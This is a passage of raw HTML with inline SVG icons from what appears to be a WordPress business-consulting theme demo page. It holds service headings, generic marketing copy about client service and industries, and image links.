	<path d="M326.623,133.062c13.785,0,25-11.215,25-25s-11.215-25.001-25-25.001s-25,11.216-25,25.001   c0,5.63,1.872,10.83,5.025,15.014l-41.076,57.401c-2.451-0.805-5.066-1.247-7.784-1.247c-6.569,0-12.551,2.551-17.017,6.709   l-27.379-15.536c0.365-1.696,0.561-3.454,0.561-5.257c0-13.785-11.215-25-25-25s-25,11.215-25,25c0,1.803,0.196,3.561,0.561,5.257   l-27.379,15.536c-4.466-4.158-10.448-6.708-17.017-6.708c-13.785,0-25,11.216-25,25.001s11.215,25.001,25,25.001   s25-11.216,25-25.001c0-1.803-0.196-3.561-0.561-5.257l27.379-15.536c4.466,4.158,10.448,6.709,17.017,6.709   c6.569,0,12.55-2.551,17.017-6.708l27.379,15.536c-0.365,1.696-0.561,3.454-0.561,5.257c0,13.785,11.215,25.001,25,25.001   c13.786,0,25.001-11.216,25.001-25.001c0-5.631-1.873-10.832-5.026-15.016l41.076-57.401   C321.289,132.62,323.905,133.062,326.623,133.062z M326.623,98.061c5.514,0,10,4.486,10,10.001c0,5.514-4.486,10-10,10   s-10-4.486-10-10C316.622,102.547,321.108,98.061,326.623,98.061z M120.115,214.231c-5.514,0-10-4.486-10-10.001   s4.486-10.001,10-10.001s10,4.486,10,10.001S125.629,214.231,120.115,214.231z M188.951,175.146c-5.514,0-10-4.486-10-10.001   c0-5.514,4.486-10,10-10s10,4.486,10,10C198.952,170.66,194.465,175.146,188.951,175.146z M257.787,214.231   c-5.514,0-10-4.486-10-10.001s4.486-10.001,10-10.001c5.515,0,10.001,4.486,10.001,10.001S263.301,214.231,257.787,214.231z"></path>
	<path d="M418.796,376.965H366.31H80.428H21.215c-3.427,0-6.215-2.788-6.215-6.215V61.331c0-3.427,2.788-6.215,6.215-6.215h35.356   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5H21.215C9.517,40.116,0,49.633,0,61.331V370.75c0,11.698,9.517,21.215,21.215,21.215   h51.713v16.506c0,9.403,7.65,17.053,17.053,17.053h75.074l-35.34,68.998c-1.888,3.687-0.431,8.206,3.256,10.095   c1.094,0.561,2.262,0.826,3.413,0.826c2.725,0,5.354-1.49,6.681-4.083l38.843-75.836h82.922l38.843,75.836   c1.328,2.593,3.956,4.083,6.681,4.083c1.151,0,2.319-0.267,3.413-0.826c3.687-1.889,5.145-6.408,3.256-10.095l-35.34-68.998h75.074   c9.403,0,17.053-7.649,17.053-17.053v-16.506h44.986c4.142,0,7.5-3.357,7.5-7.5S422.938,376.965,418.796,376.965z M358.81,408.471   c0,1.132-0.921,2.053-2.053,2.053H89.981c-1.132,0-2.053-0.921-2.053-2.053v-16.506H358.81V408.471z"></path>
	<path d="M86.571,55.116h102.672h68.251h168.028c3.427,0,6.215,2.788,6.215,6.215v71.311c0,4.143,3.358,7.5,7.5,7.5   s7.5-3.357,7.5-7.5V61.331c0-11.698-9.517-21.215-21.215-21.215H264.995V25.374c0-10.375-8.441-18.816-18.817-18.816H200.56   c-10.375,0-18.817,8.441-18.817,18.816v14.742H86.571c-4.142,0-7.5,3.357-7.5,7.5S82.429,55.116,86.571,55.116z M196.743,25.374   c0-2.104,1.712-3.816,3.817-3.816h45.618c2.104,0,3.817,1.712,3.817,3.816v14.742h-53.251V25.374z"></path>
	<path d="M104.902,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H104.902z M127.829,333.849h-15.427v-51.272h15.427V333.849z"></path>
	<path d="M173.737,229.248c-4.142,0-7.5,3.357-7.5,7.5v104.601c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5V236.748   c0-4.143-3.358-7.5-7.5-7.5H173.737z M196.665,333.849h-15.427v-89.601h15.427V333.849z"></path>
	<path d="M242.573,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5H273c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H242.573z M265.5,333.849h-15.427v-51.272H265.5V333.849z"></path>
	<path d="M311.409,311.832c-4.142,0-7.5,3.357-7.5,7.5v22.017c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5   s-3.358-7.5-7.5-7.5h-22.927v-14.517C318.909,315.189,315.551,311.832,311.409,311.832z"></path>
	<path d="M508.175,384.019l-43.027-74.526c10.901-11.619,18.839-25.816,23.079-41.64c6.777-25.291,3.299-51.708-9.793-74.384   c-27.026-46.813-87.097-62.906-133.907-35.881c-46.811,27.025-62.906,87.096-35.88,133.907   c13.092,22.676,34.231,38.896,59.522,45.674c8.446,2.263,17.015,3.382,25.53,3.382c7.442,0,14.841-0.856,22.077-2.55l43.018,74.528   c5.273,9.137,14.875,14.25,24.737,14.249c4.833,0,9.729-1.229,14.208-3.813c8.796-5.077,14.261-14.544,14.261-24.706   C512,393.28,510.678,388.357,508.175,384.019z M372.051,322.68c-21.421-5.74-39.326-19.479-50.415-38.685   c-22.89-39.648-9.257-90.526,30.39-113.417c13.043-7.53,27.296-11.106,41.374-11.106c28.715,0,56.683,14.893,72.043,41.497   c11.088,19.206,14.034,41.58,8.294,63.002c-5.74,21.422-19.479,39.325-38.685,50.414   C415.847,325.474,393.473,328.418,372.051,322.68z M490.242,409.973c-6.453,3.726-14.733,1.508-18.456-4.942l-41.388-71.704   c4.148-1.693,8.21-3.673,12.156-5.951c3.949-2.28,7.689-4.818,11.23-7.566l41.4,71.707c1.188,2.061,1.816,4.393,1.816,6.743   C497,403.078,494.41,407.567,490.242,409.973z"></path>
	<path d="M461.542,263.611c5.295-17.056,4.034-35.316-3.551-51.416c-1.766-3.748-6.234-5.354-9.981-3.589   c-3.748,1.766-5.354,6.234-3.588,9.981c5.983,12.7,6.976,27.109,2.795,40.575c-4.204,13.54-13.286,24.903-25.573,31.997   c-13.002,7.508-28.151,9.5-42.652,5.615c-14.502-3.886-26.624-13.187-34.13-26.189c-15.497-26.841-6.267-61.285,20.574-76.782   c19.625-11.329,43.98-9.815,62.051,3.857c3.304,2.5,8.007,1.849,10.506-1.455c2.499-3.303,1.848-8.007-1.456-10.506   c-22.891-17.321-53.745-19.238-78.602-4.887c-16.472,9.51-28.255,24.866-33.178,43.238s-2.396,37.562,7.114,54.034   c9.51,16.473,24.866,28.255,43.238,33.179c6.135,1.644,12.361,2.457,18.546,2.457c12.338,0,24.517-3.236,35.488-9.571   C444.71,295.163,456.216,280.767,461.542,263.611z"></path>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Advanced Analytic</a></h5>				<p>Growth, focus & analysis.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M136.53,207.562c0.446,0.08,0.89,0.118,1.327,0.118c3.564,0,6.726-2.552,7.375-6.183   c6.598-36.951,26.111-70.729,54.946-95.113c29.17-24.667,66.308-38.252,104.571-38.252c40.815,0,79.809,15.224,109.798,42.867   c3.044,2.808,7.791,2.614,10.598-0.432s2.614-7.79-0.432-10.598c-32.767-30.204-75.372-46.838-119.964-46.838   c-41.804,0-82.381,14.844-114.257,41.798c-31.498,26.635-52.816,63.545-60.027,103.93   C129.737,202.938,132.452,206.834,136.53,207.562z"></path>
	<path d="M395.017,329.524c1.897,0,3.797-0.716,5.257-2.151c26.279-25.831,40.752-60.348,40.752-97.193   c0-75.144-61.134-136.278-136.278-136.278c-30.819,0-61.021,10.578-85.044,29.787c-23.652,18.912-40.526,45.458-47.516,74.75   c-0.961,4.029,1.526,8.075,5.555,9.036c4.032,0.962,8.075-1.525,9.036-5.555c6.218-26.059,21.238-49.681,42.293-66.517   c21.683-17.338,47.852-26.502,75.676-26.502c66.873,0,121.278,54.405,121.278,121.278c0,32.789-12.88,63.507-36.267,86.496   c-2.954,2.903-2.995,7.652-0.091,10.606C391.137,328.775,393.076,329.524,395.017,329.524z"></path>
	<path d="M367.008,334.279c-18.747,11.238-40.276,17.178-62.26,17.178c-33.428,0-64.563-13.311-87.672-37.481   c-2.862-2.994-7.609-3.101-10.604-0.238c-2.994,2.862-3.101,7.61-0.238,10.604c25.965,27.158,60.952,42.115,98.514,42.115   c24.7,0,48.896-6.678,69.972-19.313c3.553-2.129,4.707-6.736,2.577-10.289C375.168,333.303,370.561,332.148,367.008,334.279z"></path>
	<path d="M304.748,139.704c-18.697,0-36.643,5.656-51.899,16.357c-14.907,10.456-26.202,24.94-32.665,41.888   c-1.476,3.87,0.465,8.204,4.335,9.68c3.87,1.478,8.205-0.465,9.68-4.335c11.083-29.063,39.434-48.59,70.548-48.59   c41.617,0,75.476,33.858,75.476,75.475s-33.858,75.476-75.476,75.476c-15.522,0-30.43-4.673-43.111-13.515   c-12.404-8.648-21.838-20.637-27.283-34.672c-1.498-3.861-5.843-5.777-9.705-4.279c-3.861,1.498-5.777,5.843-4.279,9.705   c6.527,16.823,17.83,31.191,32.688,41.55c15.21,10.605,33.084,16.211,51.69,16.211c49.888,0,90.476-40.587,90.476-90.476   S354.637,139.704,304.748,139.704z"></path>
	<path d="M120.319,294.523c-3.664-1.934-8.201-0.528-10.132,3.136c-10.091,19.14-23.911,45.353-5.271,71.411   c1.427,1.995,3.713,3.137,6.1,3.137c0.549,0,1.104-0.061,1.655-0.186c2.943-0.666,5.201-3.031,5.729-6.002   c1.514-8.514,8.798-18.489,22.206-30.367c9.176,13.464,21.644,24.868,38.622,35.423c3.039,1.889,6.986,1.369,9.432-1.241   c2.446-2.609,2.709-6.583,0.628-9.492c-13.336-18.643-3.311-37.522,8.297-59.383c10.34-19.473,21.84-41.151,13.625-63.282h51.721   c3.553,19.865,20.946,34.995,41.817,34.995c23.431,0,42.494-19.063,42.494-42.494s-19.063-42.494-42.494-42.494   c-20.87,0-38.262,15.128-41.817,34.992H113.867L79.721,197.25c-1.294-0.964-2.865-1.485-4.479-1.485H7.5   c-3.057,0-5.809,1.856-6.954,4.69c-1.145,2.835-0.455,6.081,1.744,8.205c5.898,5.696,9.147,13.338,9.147,21.52   c0,8.182-3.249,15.824-9.146,21.519c-2.2,2.124-2.89,5.37-1.745,8.205c1.146,2.835,3.896,4.691,6.954,4.691h67.741   c1.614,0,3.185-0.521,4.479-1.485l34.151-25.431h8.604c5.668,9.724,5.769,20.11,0.451,33.965c-1.484,3.867,0.447,8.206,4.314,9.69   c3.865,1.483,8.205-0.448,9.689-4.314c3.859-10.053,7.708-24.167,2.098-39.34h55.631c10.182,17.631,0.635,35.61-10.322,56.246   c-8.297,15.625-17.349,32.67-16.356,50.23c-7.978-7.166-14.203-14.884-19.047-23.522c-1.084-1.932-2.966-3.286-5.143-3.7   c-2.177-0.41-4.424,0.158-6.141,1.558c-12.267,10.01-20.948,18.887-26.546,27.296c-1.776-12.667,4.358-25.971,12.352-41.133   C125.388,300.991,123.983,296.455,120.319,294.523z M304.748,202.686c15.16,0,27.494,12.333,27.494,27.494   s-12.333,27.494-27.494,27.494c-12.56,0-23.172-8.469-26.445-19.995h26.447c4.142,0,7.5-3.358,7.5-7.5s-3.358-7.5-7.5-7.5h-26.446   C281.578,211.154,292.189,202.686,304.748,202.686z M72.755,249.594H22.053c2.871-5.976,4.384-12.568,4.384-19.415   c0-6.846-1.513-13.439-4.384-19.415h50.702l26.071,19.415L72.755,249.594z"></path>
	<path d="M504.5,443.863h-53.2l-41.456-71.217c45.173-33.355,71.947-86.089,71.947-142.469c0-38.807-12.322-75.65-35.633-106.547   c-2.494-3.306-7.197-3.964-10.504-1.47c-3.307,2.495-3.965,7.198-1.47,10.504c21.332,28.273,32.607,61.993,32.607,97.513   c0,53.746-26.574,103.887-71.089,134.129c-10.63,7.233-22.116,13.165-34.149,17.671c-0.38,0.142-0.756,0.297-1.138,0.436   c0,0-0.001,0-0.001,0c-0.001,0-0.001,0-0.002,0.001c-17.781,6.511-36.508,9.813-55.661,9.813c-19.126,0-37.855-3.302-55.664-9.813   c-12.421-4.543-24.298-10.64-35.328-18.138c-2.229-1.501-4.558-3.174-7.117-5.114c-3.301-2.504-8.004-1.856-10.507,1.444   s-1.856,8.005,1.444,10.508c0.7,0.531,1.385,1.044,2.058,1.541l-41.446,71.208h-53.194c-4.142,0-7.5,3.358-7.5,7.5   s3.358,7.5,7.5,7.5h57.43c0.025,0,0.049,0.005,0.073,0.005h54.31c0.023,0,0.045-0.005,0.068-0.005h175.733   c0.023,0,0.045,0.005,0.068,0.005h54.31c0.025,0,0.049-0.005,0.073-0.005H504.5c4.142,0,7.5-3.358,7.5-7.5   S508.642,443.863,504.5,443.863z M397.399,443.863l-24.158-50.375c0.631-0.265,1.257-0.541,1.885-0.813   c0.259-0.112,0.519-0.222,0.777-0.335c1.445-0.635,2.881-1.292,4.309-1.965c0.3-0.141,0.598-0.285,0.897-0.429   c1.42-0.68,2.833-1.373,4.235-2.091c0.049-0.025,0.098-0.049,0.147-0.074c1.435-0.737,2.856-1.499,4.271-2.275   c0.302-0.165,0.603-0.331,0.904-0.498c1.384-0.77,2.759-1.555,4.121-2.361c0.206-0.122,0.411-0.248,0.617-0.371   c0.665-0.398,1.331-0.793,1.991-1.2l36.55,62.787H397.399z M359.112,398.716l21.651,45.147H228.729l21.659-45.15   c17.515,5.648,35.768,8.515,54.362,8.515C323.367,407.228,341.62,404.361,359.112,398.716z M212.108,381.047   c7.734,4.76,15.815,8.915,24.16,12.421l-24.175,50.395h-36.546L212.108,381.047z"></path>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Corporate Finance</a></h5>				<p>Strategy is the foundation.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M54.754,149.62h87.326l-29.633,43.741c-2.323,3.429-1.426,8.092,2.003,10.415c3.43,2.322,8.093,1.427,10.416-2.003   l35.332-52.153h48.731l81.4,120.155c1.45,2.14,3.812,3.294,6.216,3.294c1.448,0,2.911-0.419,4.2-1.292   c3.429-2.323,4.326-6.986,2.003-10.415l-80.751-119.196l48.252-69.697c6.55-9.462,7.301-21.671,1.96-31.864   S256.402,24.08,244.895,24.08H124.232c-11.508,0-21.974,6.332-27.315,16.525s-4.59,22.402,1.96,31.865l31.663,45.734L66.664,80.396   c-3.565-2.109-8.164-0.93-10.274,2.634c-2.11,3.564-0.931,8.165,2.634,10.274l69.801,41.315h-74.07c-4.142,0-7.5,3.357-7.5,7.5   S50.612,149.62,54.754,149.62z M110.204,47.567c2.785-5.314,8.029-8.487,14.028-8.487h120.662c6,0,11.244,3.173,14.028,8.487   c2.785,5.313,2.408,11.432-1.007,16.364l-48.938,70.688h-48.828l-48.938-70.688C107.796,58.999,107.419,52.881,110.204,47.567z"></path>
	<path d="M393.083,250.087c-65.571,0-118.917,53.346-118.917,118.917c0,36.209,16.273,68.685,41.883,90.514   c-13.427,8.683-29.198,13.402-45.309,13.402H98.39c-22.276,0-43.217-8.674-58.967-24.424C23.674,432.747,15,411.806,15,389.53   c0-16.737,4.962-32.908,14.349-46.764l78.52-115.899c2.323-3.43,1.427-8.093-2.002-10.416c-3.429-2.322-8.093-1.427-10.416,2.002   l-78.52,115.899C5.854,350.701,0,369.781,0,389.53c0,26.282,10.234,50.99,28.817,69.573c18.582,18.582,43.291,28.816,69.573,28.816   h172.35c20.862,0,41.245-6.703,58.015-18.945c18.557,11.982,40.644,18.945,64.328,18.945C458.654,487.92,512,434.574,512,369.004   C512,303.433,458.654,250.087,393.083,250.087z M393.083,472.92c-57.3,0-103.917-46.616-103.917-103.916   s46.617-103.917,103.917-103.917S497,311.704,497,369.004S450.383,472.92,393.083,472.92z"></path>
	<path d="M470.074,327.032c-1.986-3.635-6.542-4.972-10.177-2.986c-3.635,1.985-4.973,6.542-2.987,10.178   c5.787,10.595,8.846,22.621,8.846,34.78c0,40.072-32.601,72.673-72.673,72.673s-72.673-32.601-72.673-72.673   s32.601-72.673,72.673-72.673c16.979,0,33.497,5.978,46.512,16.831c3.181,2.653,7.911,2.224,10.563-0.956   c2.653-3.182,2.225-7.911-0.956-10.563c-15.706-13.098-35.636-20.312-56.119-20.312c-48.343,0-87.673,39.33-87.673,87.673   s39.33,87.673,87.673,87.673s87.673-39.33,87.673-87.673C480.756,354.34,477.063,339.826,470.074,327.032z"></path>
	<path d="M393.083,426.906c4.142,0,7.5-3.357,7.5-7.5v-7.827h2.454c13.806,0,25.038-11.232,25.038-25.038   s-11.232-25.037-25.038-25.037h-19.908c-5.535,0-10.038-4.503-10.038-10.038s4.503-10.038,10.038-10.038h29.192   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-11.738v-7.827c0-4.143-3.358-7.5-7.5-7.5s-7.5,3.357-7.5,7.5v7.827h-2.454   c-13.806,0-25.038,11.232-25.038,25.038s11.232,25.038,25.038,25.038h19.908c5.535,0,10.038,4.503,10.038,10.037   c0,5.535-4.503,10.038-10.038,10.038h-29.192c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h11.739v7.827   C385.583,423.549,388.941,426.906,393.083,426.906z"></path>
	<path d="M332.578,156.935l5.861-4.688v68.76c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-68.76l5.861,4.688   c1.383,1.106,3.037,1.644,4.68,1.644c2.2,0,4.38-0.963,5.861-2.814c2.588-3.235,2.063-7.954-1.171-10.542l-18.046-14.437   c-0.019-0.016-0.042-0.025-0.061-0.041c-0.315-0.248-0.648-0.473-1.001-0.668c-0.007-0.003-0.013-0.008-0.02-0.012   c-0.339-0.186-0.696-0.339-1.064-0.472c-0.05-0.018-0.1-0.038-0.15-0.055c-0.347-0.116-0.704-0.207-1.071-0.272   c-0.065-0.011-0.129-0.02-0.193-0.029c-0.368-0.056-0.741-0.093-1.124-0.093s-0.756,0.038-1.124,0.093   c-0.065,0.01-0.129,0.018-0.193,0.029c-0.367,0.065-0.725,0.156-1.071,0.272c-0.051,0.017-0.1,0.037-0.15,0.055   c-0.368,0.132-0.725,0.286-1.064,0.472c-0.007,0.004-0.013,0.009-0.02,0.012c-0.353,0.195-0.686,0.421-1.001,0.668   c-0.02,0.016-0.042,0.025-0.061,0.041l-18.046,14.437c-3.234,2.588-3.759,7.307-1.171,10.542   C324.624,158.997,329.342,159.522,332.578,156.935z"></path>
	<path d="M426.867,116.712l5.861-4.688v68.76c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-68.76l5.861,4.688   c1.383,1.106,3.037,1.644,4.68,1.644c2.2,0,4.38-0.963,5.861-2.814c2.588-3.235,2.063-7.954-1.171-10.542l-18.046-14.437   c-0.019-0.016-0.042-0.025-0.061-0.041c-0.315-0.248-0.648-0.473-1.001-0.668c-0.007-0.003-0.013-0.008-0.02-0.012   c-0.339-0.186-0.696-0.339-1.064-0.472c-0.05-0.018-0.1-0.038-0.15-0.055c-0.347-0.116-0.704-0.207-1.071-0.272   c-0.065-0.011-0.129-0.02-0.193-0.029c-0.368-0.056-0.741-0.093-1.124-0.093s-0.756,0.038-1.124,0.093   c-0.065,0.01-0.129,0.018-0.193,0.029c-0.367,0.065-0.725,0.156-1.071,0.272c-0.051,0.017-0.1,0.037-0.15,0.055   c-0.368,0.132-0.725,0.286-1.064,0.472c-0.007,0.004-0.013,0.009-0.02,0.012c-0.353,0.195-0.686,0.421-1.001,0.668   c-0.02,0.016-0.042,0.025-0.061,0.041l-18.046,14.437c-3.234,2.588-3.759,7.307-1.171,10.542   C418.913,118.774,423.632,119.299,426.867,116.712z"></path>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consultation</a></h5>				<p>Professional skilled team.</p>			
										<img width="696" height="650" src="https://maxbizz.s3.amazonaws.com/images/image1-home1.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-home1.png 696w, https://maxbizz.s3.amazonaws.com/images/image1-home1-300x280.png 300w" sizes="(max-width: 696px) 100vw, 696px" />											
	        about company	        <h3>Make Digital Marketing<br>  Work For Your Business</h3>	    
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.</p><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/about-us/">Explore More </a>
		        <a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06-1.svg" alt=""></figure></a>		    
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				Exceptional Client Service 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Great Team and Winning Culture 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Commitment to Integrity, Fairness 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
										<img width="750" height="660" src="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image2-home1-300x264.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
	        our industries	        <h3>Industries What We Serv</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
						<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>					
			        				            <h6>Financial Services</h6>			            <p>We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
